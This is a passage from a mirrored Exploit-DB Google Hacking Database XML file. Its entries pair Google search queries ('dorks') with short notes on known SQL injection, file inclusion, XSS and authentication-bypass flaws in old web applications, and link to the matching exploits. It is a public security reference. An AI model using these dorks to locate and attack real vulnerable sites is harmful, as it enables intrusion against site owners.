exploit-db-mirror/ghdb.xml
Exploit-DB baedefe44c DB: 2023-12-07
1 changes to exploits/shellcodes/ghdb
2023-12-07 00:16:31 +00:00

120429 lines
5.3 MiB
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

<?xml version="1.0" encoding="utf-8"?>
<ghdb>
<entry>
<id>1499</id>
<link>https://www.exploit-db.com/ghdb/1499</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot; ActiveKB v1.5 Copyright ©&quot;</shortDescription>
<textualDescription>ActiveKB 1.5 Insecure Cookie Handling/Arbitrary Admin Access - CVE: 2008-2338: https://www.exploit-db.com/exploits/5616/</textualDescription>
<query>&quot; ActiveKB v1.5 Copyright ©&quot;</query>
<querystring>https://www.google.com/search?q=%22+ActiveKB+v1.5+Copyright+%C3%82%C2%A9%22</querystring>
<edb>https://www.exploit-db.com/exploits/5616</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2376</id>
<link>https://www.exploit-db.com/ghdb/2376</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot; created by creato.biz &quot;</shortDescription>
<textualDescription>Creato Script SQL Injection Vulnerability: https://www.exploit-db.com/exploits/12807</textualDescription>
<query>&quot; created by creato.biz &quot;</query>
<querystring>https://www.google.com/search?q=%22+created+by+creato.biz+%22</querystring>
<edb>https://www.exploit-db.com/exploits/12807</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1896</id>
<link>https://www.exploit-db.com/ghdb/1896</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot; Powered by JTL-Shop 2&quot;</shortDescription>
<textualDescription>JTL-Shop 2 (druckansicht.php) SQL Injection Vulnerability - CVE: 2010-0691: https://www.exploit-db.com/exploits/11445</textualDescription>
<query>&quot; Powered by JTL-Shop 2&quot;</query>
<querystring>https://www.google.com/search?q=%22+Powered+by+JTL-Shop+2%22</querystring>
<edb>https://www.exploit-db.com/exploits/11445</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2447</id>
<link>https://www.exploit-db.com/ghdb/2447</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot; Powered by Pie Cart Pro &quot;</shortDescription>
<textualDescription>Pie Cart Pro (Home_Path) Remote File Include Vulnerability - CVE: 2006-4970: https://www.exploit-db.com/exploits/2392</textualDescription>
<query>&quot; Powered by Pie Cart Pro &quot;</query>
<querystring>https://www.google.com/search?q=%22+Powered+by+Pie+Cart+Pro+%22</querystring>
<edb>https://www.exploit-db.com/exploits/2392</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2251</id>
<link>https://www.exploit-db.com/ghdb/2251</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot; Powered by Xpoze &quot;</shortDescription>
<textualDescription>Xpoze 4.10 (home.html menu) Blind SQL Injection Vulnerability - CVE: 2008-6352: https://www.exploit-db.com/exploits/7432</textualDescription>
<query>&quot; Powered by Xpoze &quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22+Powered+by+Xpoze+%22</querystring>
<edb>https://www.exploit-db.com/exploits/7432</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4131</id>
<link>https://www.exploit-db.com/ghdb/4131</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot; Proudly Served by LiteSpeed Web Server&quot; intitle:index.of./</shortDescription>
<textualDescription>Servers with vulnerability who exploit in this link:
https://www.exploit-db.com/exploits/13850/
Dork by Rootkit Pentester.</textualDescription>
<query>&quot; Proudly Served by LiteSpeed Web Server&quot; intitle:index.of./</query>
<querystring>https://www.google.com/search?q=&quot; Proudly Served by LiteSpeed Web Server&quot; intitle:index.of./</querystring>
<edb>https://www.exploit-db.com/exploits/13850</edb>
<date>2015-11-13</date>
<author>anonymous</author>
</entry>
<entry>
<id>3473</id>
<link>https://www.exploit-db.com/ghdb/3473</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;&amp; Spider Friendly by Crack&quot;</shortDescription>
<textualDescription>phpBB Spider Friendly Module 1.3.10 File Include - CVE: 2006-5665: https://www.exploit-db.com/exploits/2686</textualDescription>
<query>&quot;&amp; Spider Friendly by Crack&quot;</query>
<querystring>https://www.google.com/search?q=%22%26+Spider+Friendly+by+Crack%22</querystring>
<edb>https://www.exploit-db.com/exploits/2686</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2437</id>
<link>https://www.exploit-db.com/ghdb/2437</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;(C) by CyberTeddy&quot;</shortDescription>
<textualDescription>WebLog (index.php file) Remote File Disclosure Vulnerability - CVE: 2007-1487: https://www.exploit-db.com/exploits/3484</textualDescription>
<query>&quot;(C) by CyberTeddy&quot;</query>
<querystring>https://www.google.com/search?q=%22(C)+by+CyberTeddy%22</querystring>
<edb>https://www.exploit-db.com/exploits/3484</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3084</id>
<link>https://www.exploit-db.com/ghdb/3084</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;(C) This site is NITROpowered!&quot;</shortDescription>
<textualDescription>NITRO Web Gallery SQL Injection Vulnerability - CVE: 2010-2141: https://www.exploit-db.com/exploits/12735</textualDescription>
<query>&quot;(C) This site is NITROpowered!&quot;</query>
<querystring>https://www.google.com/search?q=%22(C)+This+site+is+NITROpowered!%22</querystring>
<edb>https://www.exploit-db.com/exploits/12735</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3660</id>
<link>https://www.exploit-db.com/ghdb/3660</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;/index.php?id=cmp-noticias&quot;</shortDescription>
<textualDescription>Submitter: xoron http://server/index.php?id=cmp-noticias&amp;n=[SQLi]</textualDescription>
<query>&quot;/index.php?id=cmp-noticias&quot;</query>
<querystring>https://www.google.com/search?q=%22/index.php?id=cmp-noticias%22</querystring>
<edb></edb>
<date>2010-12-29</date>
<author>anonymous</author>
</entry>
<entry>
<id>3047</id>
<link>https://www.exploit-db.com/ghdb/3047</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;/nuke/htmltonuke.php&quot; - &quot;htmltonuke.php&quot;</shortDescription>
<textualDescription>PHP-Nuke Module htmltonuke 2.0alpha (htmltonuke.php) RFI Vuln: https://www.exploit-db.com/exploits/3524</textualDescription>
<query>&quot;/nuke/htmltonuke.php&quot; - &quot;htmltonuke.php&quot;</query>
<querystring>https://www.google.com/search?q=%22/nuke/htmltonuke.php%22+-+%22htmltonuke.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/3524</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2879</id>
<link>https://www.exploit-db.com/ghdb/2879</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;/nuke/iframe.php&quot;</shortDescription>
<textualDescription>iFrame for Phpnuke (iframe.php) Remote File Inclusion Vulnerability - CVE: 2007-1626: https://www.exploit-db.com/exploits/3512</textualDescription>
<query>&quot;/nuke/iframe.php&quot;</query>
<querystring>https://www.google.com/search?q=%22%2Fnuke%2Fiframe.php%22</querystring>
<edb>https://www.exploit-db.com/exploits/3512</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3178</id>
<link>https://www.exploit-db.com/ghdb/3178</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;/subcat.php?cate_id=&quot;</shortDescription>
<textualDescription>AJ Forum 1.0 (topic_title.php) Remote SQL Injection - CVE: 2007-1295: https://www.exploit-db.com/exploits/3411</textualDescription>
<query>&quot;/subcat.php?cate_id=&quot;</query>
<querystring>https://www.google.com/search?q=%22/subcat.php%3Fcate_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/3411</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3222</id>
<link>https://www.exploit-db.com/ghdb/3222</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;/subcat.php?cate_id=&quot;</shortDescription>
<textualDescription>AJ Auction Pro All Versions (subcat.php) Remote SQL Injection - CVE: 2007-1298: https://www.exploit-db.com/exploits/3408</textualDescription>
<query>&quot;/subcat.php?cate_id=&quot;</query>
<querystring>https://www.google.com/search?q=%22/subcat.php%3Fcate_id%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/3408</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2057</id>
<link>https://www.exploit-db.com/ghdb/2057</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;100% | 50% | 25%&quot; &quot;Back to gallery&quot; inurl:&quot;show.php?imageid=&quot;</shortDescription>
<textualDescription>Easy Photo Gallery 2.1 Arbitrary Add Admin / remove user Vulnerability - CVE: 2008-4167: https://www.exploit-db.com/exploits/6437</textualDescription>
<query>&quot;100% | 50% | 25%&quot; &quot;Back to gallery&quot; inurl:&quot;show.php?imageid=&quot;</query>
<querystring>https://www.google.com/search?q=%22100%25+|+50%25+|+25%25%22+%22Back+to+gallery%22+inurl:%22show.php%3Fimageid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6437</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3468</id>
<link>https://www.exploit-db.com/ghdb/3468</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;100% | 50% | 25%&quot; &quot;Back to gallery&quot; inurl:&quot;show.php?imageid=&quot;</shortDescription>
<textualDescription>Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection - CVE: 2008-6988: https://www.exploit-db.com/exploits/6428</textualDescription>
<query>&quot;100% | 50% | 25%&quot; &quot;Back to gallery&quot; inurl:&quot;show.php?imageid=&quot;</query>
<querystring>https://www.google.com/search?q=%22100%25+|+50%25+|+25%25%22+%22Back+to+gallery%22+inurl:%22show.php%3Fimageid%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6428</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>569</id>
<link>https://www.exploit-db.com/ghdb/569</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;1999-2004 FuseTalk Inc&quot; -site:fusetalk.com</shortDescription>
<textualDescription>Fusetalk forums (v4) are susceptible to cross site scripting attacks that can be exploited by passing a img src with malicious javascript.</textualDescription>
<query>&quot;1999-2004 FuseTalk Inc&quot; -site:fusetalk.com</query>
<querystring>https://www.google.com/search?q=%221999-2004+FuseTalk+Inc%22+-site%3Afusetalk.com</querystring>
<edb></edb>
<date>2004-10-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>570</id>
<link>https://www.exploit-db.com/ghdb/570</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2003 DUware All Rights Reserved&quot;</shortDescription>
<textualDescription>Multiple vulnerabilities have been identified in the software that may allow a remote attacker to carry out SQL injection and HTML injection attacks. An attacker may also gain unauthorized access to a user's account. DUclassmate may allow unauthorized remote attackers to gain access to a computer. DUclassified is reported prone to multiple SQL injection vulnerabilities. SQL injection issues also affect DUforum. DUclassified and DUforum are also reported vulnerable to various unspecified HTML injection vulnerabilities.</textualDescription>
<query>&quot;2003 DUware All Rights Reserved&quot;</query>
<querystring>https://www.google.com/search?q=%222003+DUware+All+Rights+Reserved%22&amp;filter=0</querystring>
<edb></edb>
<date>2004-10-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>1324</id>
<link>https://www.exploit-db.com/ghdb/1324</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2004-2005 ReloadCMS Team.&quot;</shortDescription>
<textualDescription>this is for ReloadCMS</textualDescription>
<query>&quot;2004-2005 ReloadCMS Team.&quot;</query>
<querystring>https://www.google.com/search?q=intext%3A%222000-2001+The+phpHeaven+Team%22+-sourceforge+&amp;btnG=Cerca+con+Google&amp;meta=&amp;num=100&amp;filter=0</querystring>
<edb></edb>
<date>2006-04-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>1216</id>
<link>https://www.exploit-db.com/ghdb/1216</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2005 SugarCRM Inc. All Rights Reserved&quot; &quot;Powered By SugarCRM&quot;</shortDescription>
<textualDescription>this is the dork for Sugar Suite 3.5.2a &amp; 4.0beta remote code execution issue, advisory &amp; poc exploit:http://rgod.altervista.org/sugar_suite_40beta.html</textualDescription>
<query>&quot;2005 SugarCRM Inc. All Rights Reserved&quot; &quot;Powered By SugarCRM&quot;</query>
<querystring>https://www.google.com/search?q=%222005+SugarCRM+Inc.+All+Rights+Reserved%22+%22Powered+By+SugarCRM%22</querystring>
<edb></edb>
<date>2005-12-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>1793</id>
<link>https://www.exploit-db.com/ghdb/1793</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2005 www.frank-karau.de&quot; | &quot;2006 www.frank-karau.de&quot;</shortDescription>
<textualDescription>GL-SH Deaf Forum 6.4.4 Local File Inclusion Vulnerabilities - CVE: 2007-3535: https://www.exploit-db.com/exploits/4124</textualDescription>
<query>&quot;2005 www.frank-karau.de&quot; | &quot;2006 www.frank-karau.de&quot;</query>
<querystring>https://www.google.com/search?q=%222005++www.frank-karau.de%22+|+%222006++www.frank-karau.de%22</querystring>
<edb>https://www.exploit-db.com/exploits/4124</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1563</id>
<link>https://www.exploit-db.com/ghdb/1563</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2006 by www.mani-stats-reader.de.vu&quot;</shortDescription>
<textualDescription>Mani Stats Reader 1.2 (ipath) Remote File Include Vulnerability - CVE: 2007-1299: https://www.exploit-db.com/exploits/3398</textualDescription>
<query>&quot;2006 by www.mani-stats-reader.de.vu&quot;</query>
<querystring>https://www.google.com/search?q=%222006+by+www.mani-stats-reader.de.vu%22</querystring>
<edb>https://www.exploit-db.com/exploits/3398</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2440</id>
<link>https://www.exploit-db.com/ghdb/2440</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2007 BookmarkX script&quot;</shortDescription>
<textualDescription>BookmarkX script 2007 (topicid) Remote SQL Injection Vulnerability - CVE: 2008-0695: https://www.exploit-db.com/exploits/5040</textualDescription>
<query>&quot;2007 BookmarkX script&quot;</query>
<querystring>https://www.google.com/search?q=%222007+BookmarkX+script%22</querystring>
<edb>https://www.exploit-db.com/exploits/5040</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1478</id>
<link>https://www.exploit-db.com/ghdb/1478</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5&quot;</shortDescription>
<textualDescription>Radio istek scripti 2.5 Remote Configuration Disclosure Vulnerability - CVE: 2009-4096: https://www.exploit-db.com/exploits/10231</textualDescription>
<query>&quot;2007 RADIOZAZA www.radiozaza.de? istek hatti Version 2.5&quot;</query>
<querystring>https://www.google.com/search?q=%222007+RADIOZAZA+www.radiozaza.de%3F+istek+hatti+Version+2.5%22</querystring>
<edb>https://www.exploit-db.com/exploits/10231</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3498</id>
<link>https://www.exploit-db.com/ghdb/3498</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2007 Rafal Kucharski&quot; </shortDescription>
<textualDescription>RTWebalbum 1.0.462 (AlbumID) Blind SQL Injection - CVE: 2009-1910: https://www.exploit-db.com/exploits/8648</textualDescription>
<query>&quot;2007 Rafal Kucharski&quot;</query>
<querystring>https://www.google.com/search?q=%222007+Rafal+Kucharski%22</querystring>
<edb>https://www.exploit-db.com/exploits/8648</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3172</id>
<link>https://www.exploit-db.com/ghdb/3172</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;2009 Jorp&quot; </shortDescription>
<textualDescription>Jorp 1.3.05.09 Remote Arbitrary Remove Projects/Tasks Vulnerabilities: https://www.exploit-db.com/exploits/8752</textualDescription>
<query>&quot;2009 Jorp&quot;</query>
<querystring>https://www.google.com/search?q=%222009+Jorp%22</querystring>
<edb>https://www.exploit-db.com/exploits/8752</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2855</id>
<link>https://www.exploit-db.com/ghdb/2855</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Absolute Poll Manager XE&quot;</shortDescription>
<textualDescription>Absolute Poll Manager XE 4.1 Cookie Handling Vulnerability - CVE: 2008-6860: https://www.exploit-db.com/exploits/6883</textualDescription>
<query>&quot;Absolute Poll Manager XE&quot;</query>
<querystring>https://www.google.com/search?q=%22Absolute+Poll+Manager+XE%22</querystring>
<edb>https://www.exploit-db.com/exploits/6883</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>4448</id>
<link>https://www.exploit-db.com/ghdb/4448</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Access Denied&quot; &quot;Powered by Incapsula&quot; ext:php</shortDescription>
<textualDescription>Finds vulnerable pages that triggered Incapsula WAF
Dxtroyer</textualDescription>
<query>&quot;Access Denied&quot; &quot;Powered by Incapsula&quot; ext:php</query>
<querystring>https://www.google.com/search?q=&quot;Access Denied&quot; &quot;Powered by Incapsula&quot; ext:php</querystring>
<edb></edb>
<date>2017-04-26</date>
<author>Dxtroyer</author>
</entry>
<entry>
<id>1846</id>
<link>https://www.exploit-db.com/ghdb/1846</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;AcmlmBoard v1.A2&quot;</shortDescription>
<textualDescription>AcmlmBoard 1.A2 (pow) Remote SQL Injection Vulnerability - CVE: 2008-5198: https://www.exploit-db.com/exploits/5969</textualDescription>
<query>&quot;AcmlmBoard v1.A2&quot;</query>
<querystring>https://www.google.com/search?q=%22AcmlmBoard+v1.A2%22</querystring>
<edb>https://www.exploit-db.com/exploits/5969</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>542</id>
<link>https://www.exploit-db.com/ghdb/542</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Active Webcam Page&quot; inurl:8080</shortDescription>
<textualDescription>Active WebCam is a shareware program for capturing and sharing the video streams from a lot of video devices. Known bugs: directory traversal and cross site scripting</textualDescription>
<query>&quot;Active Webcam Page&quot; inurl:8080</query>
<querystring>https://www.google.com/search?hl=es&amp;q=%22Active+Webcam+Page%22++inurl%3A8080&amp;btnG=B%C3%BAsqueda</querystring>
<edb></edb>
<date>2004-10-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>2071</id>
<link>https://www.exploit-db.com/ghdb/2071</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;ActualAnalyzer Lite (free) 2.78&quot;+&quot;Copyright © 2006 ActualScripts&quot;</shortDescription>
<textualDescription>ActualAnalyzer Lite (free) 2.78 Local File Inclusion Vulnerability - CVE: 2008-2076: https://www.exploit-db.com/exploits/5528</textualDescription>
<query>&quot;ActualAnalyzer Lite (free) 2.78&quot;+&quot;Copyright © 2006 ActualScripts&quot;</query>
<querystring>https://www.google.com/search?q=%22ActualAnalyzer+Lite+(free)+2.78%22%2B%22Copyright+%C3%82%C2%A9+2006+ActualScripts%22</querystring>
<edb>https://www.exploit-db.com/exploits/5528</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2925</id>
<link>https://www.exploit-db.com/ghdb/2925</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;advanced_search_results.php?gender=&quot;</shortDescription>
<textualDescription>Vastal I-Tech Dating Zone (fage) SQL Injection Vulnerability - CVE: 2008-4461: https://www.exploit-db.com/exploits/6388</textualDescription>
<query>&quot;advanced_search_results.php?gender=&quot;</query>
<querystring>https://www.google.com/search?q=%22advanced_search_results.php%3Fgender%3D%22</querystring>
<edb>https://www.exploit-db.com/exploits/6388</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1529</id>
<link>https://www.exploit-db.com/ghdb/1529</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Affiliate Network Pro&quot;</shortDescription>
<textualDescription>AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability - CVE: 2008-3240: https://www.exploit-db.com/exploits/6087</textualDescription>
<query>&quot;Affiliate Network Pro&quot;</query>
<querystring>https://www.google.com/search?q=%22Affiliate+Network+Pro%22</querystring>
<edb>https://www.exploit-db.com/exploits/6087</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1567</id>
<link>https://www.exploit-db.com/ghdb/1567</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;All Rights Reserved. Powered by DieselScripts.com&quot;</shortDescription>
<textualDescription>Diesel Joke Site (picture_category.php id) SQL Injection Vulnerability - CVE: 2008-4150: https://www.exploit-db.com/exploits/6488</textualDescription>
<query>&quot;All Rights Reserved. Powered by DieselScripts.com&quot;</query>
<querystring>https://www.google.com/search?q=%22All+Rights+Reserved.+Powered+by+DieselScripts.com%22</querystring>
<edb>https://www.exploit-db.com/exploits/6488</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3315</id>
<link>https://www.exploit-db.com/ghdb/3315</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;AlumniServer project&quot; </shortDescription>
<textualDescription>AlumniServer 1.0.1 (Auth Bypass) SQL Injection Vulnerability: https://www.exploit-db.com/exploits/9019</textualDescription>
<query>&quot;AlumniServer project&quot;</query>
<querystring>https://www.google.com/search?q=%22AlumniServer+project%22</querystring>
<edb>https://www.exploit-db.com/exploits/9019</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3577</id>
<link>https://www.exploit-db.com/ghdb/3577</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;AlumniServer project&quot;</shortDescription>
<textualDescription>AlumniServer 1.0.1 (resetpwemail) Blind SQL Injection: https://www.exploit-db.com/exploits/9020</textualDescription>
<query>&quot;AlumniServer project&quot;</query>
<querystring>https://www.google.com/search?q=%22AlumniServer+project%22</querystring>
<edb>https://www.exploit-db.com/exploits/9020</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2744</id>
<link>https://www.exploit-db.com/ghdb/2744</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;and Powered By :Sansak&quot;</shortDescription>
<textualDescription>WebBoard 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability: https://www.exploit-db.com/exploits/6303</textualDescription>
<query>&quot;and Powered By :Sansak&quot;</query>
<querystring>https://www.google.com/search?q=%22and+Powered+By+:Sansak%22</querystring>
<edb>https://www.exploit-db.com/exploits/6303</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2211</id>
<link>https://www.exploit-db.com/ghdb/2211</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;ATutor 1.6.4&quot;</shortDescription>
<textualDescription>ATutor 1.6.4 Multiple Cross Site Scripting - CVE: 2010-0971: https://www.exploit-db.com/exploits/11685</textualDescription>
<query>&quot;ATutor 1.6.4&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22ATutor+1.6.4%22</querystring>
<edb>https://www.exploit-db.com/exploits/11685</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2302</id>
<link>https://www.exploit-db.com/ghdb/2302</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Aurora CMS&quot;</shortDescription>
<textualDescription>Aurora CMS Remote SQL Injection: https://www.exploit-db.com/exploits/10609</textualDescription>
<query>&quot;Aurora CMS&quot;</query>
<querystring>https://www.google.com/search?biw=1280&amp;bih=685&amp;q=%22Aurora+CMS%22</querystring>
<edb>https://www.exploit-db.com/exploits/10609</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>2425</id>
<link>https://www.exploit-db.com/ghdb/2425</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;© 2005-2006 Powered by eSyndiCat Link Exchange Script&quot;</shortDescription>
<textualDescription>eSyndiCat Link Exchange Script 2005-2006 SQL Injection Vulnerability - CVE: 2007-6543: https://www.exploit-db.com/exploits/4791</textualDescription>
<query>&quot;© 2005-2006 Powered by eSyndiCat Link Exchange Script&quot;</query>
<querystring>https://www.google.com/search?q=%22%C3%82%C2%A9+2005-2006+Powered+by+eSyndiCat+Link+Exchange+Script%22</querystring>
<edb>https://www.exploit-db.com/exploits/4791</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3539</id>
<link>https://www.exploit-db.com/ghdb/3539</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Barbecued by sNews&quot;</shortDescription>
<textualDescription>sNews 1.5.30 Remote Reset Admin Pass / Command Exec Exploit - CVE: 2007-0261: https://www.exploit-db.com/exploits/3116</textualDescription>
<query>&quot;Barbecued by sNews&quot;</query>
<querystring>https://www.google.com/search?q=%22Barbecued+by+sNews%22</querystring>
<edb>https://www.exploit-db.com/exploits/3116</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3537</id>
<link>https://www.exploit-db.com/ghdb/3537</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Basado en Spirate&quot; </shortDescription>
<textualDescription>Small Pirate v-2.1 (XSS/SQL) Multiple Remote Vulnerabilities - CVE: 2009-4936: https://www.exploit-db.com/exploits/8819</textualDescription>
<query>&quot;Basado en Spirate&quot;</query>
<querystring>https://www.google.com/search?q=%22Basado+en+Spirate%22</querystring>
<edb>https://www.exploit-db.com/exploits/8819</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>1215</id>
<link>https://www.exploit-db.com/ghdb/1215</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Based on DoceboLMS 2.0&quot;</shortDescription>
<textualDescription>advisory &amp; poc exploit:http://rgod.altervista.org/docebo204_xpl.html</textualDescription>
<query>&quot;Based on DoceboLMS 2.0&quot;</query>
<querystring>https://www.google.com/search?q=%22Based+on+DoceboLMS+2.0%22&amp;start=50&amp;sa=N</querystring>
<edb></edb>
<date>2005-12-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>3567</id>
<link>https://www.exploit-db.com/ghdb/3567</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;Betrieben mit Serendipity 1.0.3&quot;</shortDescription>
<textualDescription>Serendipity 1.0.3 (comment.php) Local File Include - CVE: 2006-6242:
https://www.exploit-db.com/exploits/2869</textualDescription>
<query>&quot;Betrieben mit Serendipity 1.0.3&quot;</query>
<querystring>https://www.google.com/search?q=%22Betrieben+mit+Serendipity+1.0.3%22</querystring>
<edb>https://www.exploit-db.com/exploits/2869</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3268</id>
<link>https://www.exploit-db.com/ghdb/3268</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;BioScripts&quot; </shortDescription>
<textualDescription>MiniTwitter 0.2b Multiple SQL Injection Vulnerabilities - CVE: 2009-2573: https://www.exploit-db.com/exploits/8586</textualDescription>
<query>&quot;BioScripts&quot;</query>
<querystring>https://www.google.com/search?q=%22BioScripts%22</querystring>
<edb>https://www.exploit-db.com/exploits/8586</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3420</id>
<link>https://www.exploit-db.com/ghdb/3420</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;BioScripts&quot; </shortDescription>
<textualDescription>MiniTwitter 0.2b Remote User Options Change - CVE: 2009-2574: https://www.exploit-db.com/exploits/8587</textualDescription>
<query>&quot;BioScripts&quot;</query>
<querystring>https://www.google.com/search?q=%22BioScripts%22</querystring>
<edb>https://www.exploit-db.com/exploits/8587</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>3455</id>
<link>https://www.exploit-db.com/ghdb/3455</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;BioScripts&quot; </shortDescription>
<textualDescription>MiniTwitter 0.3-Beta (SQL/XSS) Multiple Remote Vulnerabilities: https://www.exploit-db.com/exploits/8778</textualDescription>
<query>&quot;BioScripts&quot;</query>
<querystring>https://www.google.com/search?q=%22BioScripts%22</querystring>
<edb>https://www.exploit-db.com/exploits/8778</edb>
<date>2010-11-15</date>
<author>anonymous</author>
</entry>
<entry>
<id>631</id>
<link>https://www.exploit-db.com/ghdb/631</link>
<category>Advisories and Vulnerabilities</category>
<shortDescription>&quot;BlackBoard 1.5.1-f | © 2003-4 by Yves Goergen&quot;</shortDescription>
